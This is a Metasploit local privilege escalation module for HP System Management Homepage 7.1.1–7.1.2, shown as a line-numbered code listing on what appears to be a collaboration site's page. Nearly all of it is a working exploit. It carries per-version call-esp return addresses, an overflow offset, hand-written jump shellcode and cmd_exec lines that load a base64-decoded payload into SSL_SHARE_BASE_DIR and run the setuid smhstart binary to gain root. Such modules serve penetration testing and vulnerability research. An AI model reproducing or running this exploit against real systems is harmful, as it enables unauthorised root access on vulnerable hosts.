Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::EXE
10
  include Msf::Post::File
11

12
  include Msf::Exploit::Local::Linux
13

14
  def initialize(info={})
15
    super( update_info( info, {
16
        'Name'          => 'HP System Management Homepage Local Privilege Escalation',
17
        'Description'   => %q{
18
            Versions of HP System Management Homepage <= 7.1.2 include a setuid root
19
          smhstart which is vulnerable to a local buffer overflow in SSL_SHARE_BASE_DIR
20
          env variable.
21
        },
22
        'License'       => MSF_LICENSE,
23
        'Author'        =>
24
          [
25
            'agix' # @agixid # Vulnerability discovery and Metasploit module
26
          ],
27
        'Platform'      => [ 'linux' ],
28
        'Arch'          => [ ARCH_X86 ],
29
        'SessionTypes'  => [ 'shell' ],
30
        'Payload'		=>
31
          {
32
            'Space'     => 227,
33
            'BadChars' 	=> "\x00\x22"
34
          },
35
        'References'    =>
36
          [
37
            ['OSVDB', '91990']
38
          ],
39
        'Targets'       =>
40
          [
41
            [ 'HP System Management Homepage 7.1.1',
42
              {
43
                'Arch' => ARCH_X86,
44
                'CallEsp' => 0x080c86eb, # call esp
45
                'Offset' => 58
46
              }
47
            ],
48
            [ 'HP System Management Homepage 7.1.2',
49
              {
50
                'Arch' => ARCH_X86,
51
                'CallEsp' => 0x080c8b9b, # call esp
52
                'Offset' => 58
53
              }
54
            ],
55
          ],
56
        'DefaultOptions' =>
57
          {
58
            'PrependSetuid'    => true
59
          },
60
        'DefaultTarget' => 0,
61
        'DisclosureDate' => '2013-03-30',
62
      }
63
      ))
64
    register_options([
65
        OptString.new("smhstartDir", [ true, "smhstart directory", "/opt/hp/hpsmh/sbin/" ])
66
      ])
67
  end
68

69
  def exploit
70
    pl = payload.encoded
71
    padding = rand_text_alpha(target['Offset'])
72
    ret = [target['CallEsp']].pack('V')
73
    exploit =  pl
74
    exploit << ret
75
    exploit << "\x81\xc4\x11\xff\xff\xff" 	# add esp, 0xffffff11
76
    exploit << "\xe9\x0e\xff\xff\xff"		# jmp => beginning of pl
77
    exploit << padding
78
    exploit_encoded = Rex::Text.encode_base64(exploit) # to not break the shell base64 is better
79
    id=cmd_exec("id -un")
80
    if id!="hpsmh"
81
      fail_with(Failure::NoAccess, "You are #{id}, you must be hpsmh to exploit this")
82
    end
83
    cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit_encoded}' | base64 -d)")
84
    cmd_exec("#{datastore['smhstartDir']}/smhstart")
85
  end
86
end
87

88